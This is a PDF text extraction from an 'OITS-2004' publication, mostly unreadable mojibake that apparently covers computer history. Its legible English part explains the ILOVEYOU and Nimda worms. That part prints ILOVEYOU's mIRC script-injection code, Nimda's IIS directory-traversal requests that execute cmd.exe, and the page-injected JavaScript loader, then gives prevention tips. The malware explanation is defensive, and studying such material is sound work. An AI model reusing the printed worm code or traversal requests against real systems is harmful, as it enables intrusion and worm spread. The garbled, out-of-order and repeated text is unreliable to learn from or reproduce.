aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 42: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil 